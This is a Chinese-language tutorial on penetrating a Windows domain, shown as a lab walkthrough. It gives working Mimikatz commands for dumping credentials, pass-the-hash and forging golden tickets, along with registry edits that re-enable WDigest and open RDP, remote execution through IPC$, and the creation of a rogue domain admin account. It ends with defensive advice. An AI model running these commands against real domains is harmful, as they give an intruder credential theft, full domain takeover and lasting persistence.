内网渗透基础：域环境权限获取与维持

Hash 读取

此处 Hash 读取通过工具 Mimikatz 来进行，Mimikatz 是由 Benjamin Delpy 创建开发的一个能够从内存中读取 hash 账号密码的工具，也可以说是内网渗透中的神器。

下面介绍如何通过 Mimikatz 工具读取服务器内存中存储的 hash 密码。

1. 首先以管理员权限打开 Mimikatz。
2. 使用 privilege::debug 提升权限。
3. 使用 sekurlsa::logonpasswords 读取到内存中的管理者账号的明文密码和本机的 web 用户的密码。
4. 远程桌面登录管理员账号。

Hash 传递

基础知识

上面介绍了如何进行 Hash 读取，如果域控管理员使用自己的域控账号登录了服务器，那么就可以抓取到域控的账号和密码了。这样的危害性是巨大的，所以在渗透测试过程中，内网的机器往往会打 KB2871997 补丁，并且修改注册表关闭 Wdigest Auth。这样抓取的就不是明文密码了。虽然还是能够获取密文 Hash，但是密文 Hash 往往不可逆，解开需要花费大量精力。

在域环境下，检测密码不是先将 Hash 解密再验证是否正确的。在验证输入的账号密码是否正确的时候，是通过验证 Hash 是否相同来进行校验的。也就是说，或许我们可以通过获取的 Hash 来伪造管理员账号密码登录，也就是 Hash 传递，又叫 PTH，通过将获取的 NTLM 密文传递到验证登录的机器，绕过正常验证进行登录系统。

Wdigest

注册表中的 Wdigest 功能关系着内存中是否有明文密码，通过查看注册表键值，可以判断 Wdigest 功能状态。如果该项值为'1'则为开启，即可以获取明文密码，如果该项值为'0'，则明文密码不会出现在内存中。开启和关闭 Wdigest Auth 命令如下：

（1）开启 Wdigest Auth

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

（2）关闭 Wdigest Auth

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

IPC$

概念

IPC$ (Internet Process Connection) 是共享'命名管道'的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

IPC$的使用条件：

• 开放了 139、445 端口；
• 目标开启 IPC$文件共享；
• 获取用户账号密码。

在内网中，默认就会开启 IPC$共享文件服务，默认会将 C 盘共享出来，也就是说，我们可以通过 IPC 获取目标 C 盘的权限。

IPC$常用命令

IPC$命令执行

1. 通过 at 命令制定计划进行命令执行。

at \\192.168.1.1 11:15am cmd /c "whoami"

2. 通过 at 命令制定计划进行多层代理的命令执行。

at \\192.168.100.1 11:15am cmd /c "net use \\192.168.200.1\ipc$ 密码 /user:账号"
at \\192.168.100.1 11:15am cmd /c "at \\192.168.100.1 11:15am cmd /c \"whoami\" "

Hash 传递实战演示

1. 首先尝试抓取密码发现获取的全部都是密文。
2. 这里虽然没有获取到明文密码，但是获取了域管理员用户的 NTLM。
3. 提权到 SYSTEM 权限，执行 net user /domain，获取域管所在的主机地址。
4. 尝试使用 ipc$读取域管的 c 盘目录，显示拒绝访问。
5. 通过 Mimikatz 工具进行 Hash 传递。

sekurlsa::pth /user:administrator /domain:"ajie.cool" /ntlm:f1de694efa543bb780da59c049541ea3

6. 执行完之后会弹出一个命令提示符，执行 dir \\AD.ajie.cool\c$ 成功无需账号密码获取了域控机器的 c 盘的权限，列出了 c 盘的文件。
7. 在通过 PTH 弹出的命令提示符中通过 cd .. 跳转到 PsExec.exe 文件所在目录，执行命令提权获取一个域控机器的 cmd 命令提示符。
8. 执行 ipconfig 可以看到是域控所在机器的 IP 地址，成功拿到域控所在机器的权限。
9. 在域控中新建用户并加到管理员组。
10. 以新创建的用户远程桌面登录域控，发现无法连接远程桌面服务。
11. 通过 reg 命令查询注册表，查看远程桌面服务发现返回 0x01，说明远程桌面服务没有开启。（开启则返回 0x00）

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

12. 通过拿到的域控的命令提示符来执行修改注册表操作，打开远程服务功能。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

13. 以新建的 hackerend 用户远程桌面登录域控。

黄金票据

基础知识

前面了解到在域环境中，域控的账号密码可以登录域内任意一台主机，那么主机是如何检测域控账号密码是否正确的呢？检验账号密码可以有两种方法，询问域控或者设置一个专门检测账号密码是否正确的第三方中心。在域中便使用到了第三方中心来检验输入的账号密码是否相同。这种第三方中心叫 KDC 密钥分发中心。

KDC 密钥分发中心

KDC (kerberos Distribution Center) 密钥分发中心，维护所有账户的名称和 Master Key（key 的 hash code）。

提供：AS 认证服务、TGS 票据授予服务。

AS

授权服务（Authorization Server），对于上面的流程 1，提供初始授权认证，用户表明需求并使用密码对请求进行加密，AS 用提供的密码对请求进行解密后得到的请求内容，返回给用户一个 TGT（票据授权票据 ticket granting tickets）（用一个密码加密）。

TGS

用户得到 TGT 之后使用 TGT 去访问 TGS（票据授权中心 Ticket Granting Server），TGS 验证 TGT 后（使用密钥解密），返回一个 Ticket 给用户；用户得到 Ticket 后去访问 Server，Server 收到 Ticket 和 KDC 进行验证，通过后提供服务。

票据

在内网渗透中，票据分为白银票据和黄金票据。分别对应域普通用户的票据和域管理员的票据。票据就是 Kerberos 认证协议的 Ticket，因为已经经过了 AS 和 TGS 的校验，所以获取了票据之后，可以任意登录目标主机。

在查询域内用户的时候，总会看到一个用户叫 krbtgt，如图 5-37 所示。krbtgt 账户其实就是 KDC 秘钥分发中心用的超管账户。我们拿着 krbtgt 账户的票据，去访问域内机器，目标主机会认为我们是 KDC 秘钥分发中心，所以直接给了最高的权限允许我们访问。

一般管理员会修改域控账号的密码，但是很少有管理员会修改 Krbtgt 的密码。在内网渗透的最后阶段，我们需要通过获取黄金票据进行权限维持，那么下面将介绍如何获取 krbtgt 账户的黄金票据。

实战演示

1. 首先通过远程桌面将 mimikatz.exe 和 PsExec.exe 上传到域控主机。
2. 通过 PsExec 提权为 SYSTEM，然后执行 Mimikatz，输入命令 lsadump::dcsync /user:krbtgt 获取 krbtgt 的 hash 值。
3. 这里制作黄金票据需要的数据为：

Object Security ID   : S-1-5-21-3296092892-1320626564-2720975204
Hash NTLM: 31edc56a2302a25a2e9bee5f04abd659

原 Object Security ID 最后面有个 -502 是作为标识的，在制作时需要手动删除。

4. 退出远程桌面，在攻击机通过 Mimikatz 制作黄金票据。执行命令后会生成一个 AD.kiribi 文件。

kerberos::golden /admin:administrator /domain:ajie.cool /sid:S-1-5-21-3296092892-1320626564-2720975204 /krbtgt:31edc56a2302a25a2e9bee5f04abd659 /ticket:administrator.kiribi

5. 制作完票据之后，先尝试获取域控的 c 盘的权限发现拒绝访问。
6. 通过 kerberos::purge 清空票据缓存；kerberos::list 列出票据显示为空，说明清空了所有票据。
7. 通过 kerberos::ptt administrator.kiribi 加载生成的票据。
8. 成功无密码获取域控 c 盘权限，后面进一步提权与 Hash 传递处相仿，就不做演示了。

防御建议

针对上述内网渗透技术，企业应加强以下防护措施：

1. 最小权限原则：限制域管理员权限，避免高权限账号在日常终端登录。
2. 补丁管理：及时更新 KB2871997 等安全补丁，防止哈希泄露。
3. 监控审计：部署 SIEM 系统，监控异常的 Kerberos 请求和异常登录行为。
4. 凭证保护：定期轮换 krbtgt 账户密码，启用 LAPS 管理本地管理员密码。
5. 网络分段：实施严格的网络隔离，减少横向移动的可能性。

总结

本文详细阐述了内网渗透的核心技术路径，从基础的 Webshell 获取到域环境的深度控制。通过内网穿透、信息收集、哈希提取、哈希传递及黄金票据攻击，攻击者可以在域环境中实现权限维持和横向移动。理解这些技术原理有助于安全人员构建更完善的防御体系，及时发现并阻断潜在的内网威胁。在实际操作中，请务必遵守相关法律法规，仅在授权范围内进行测试。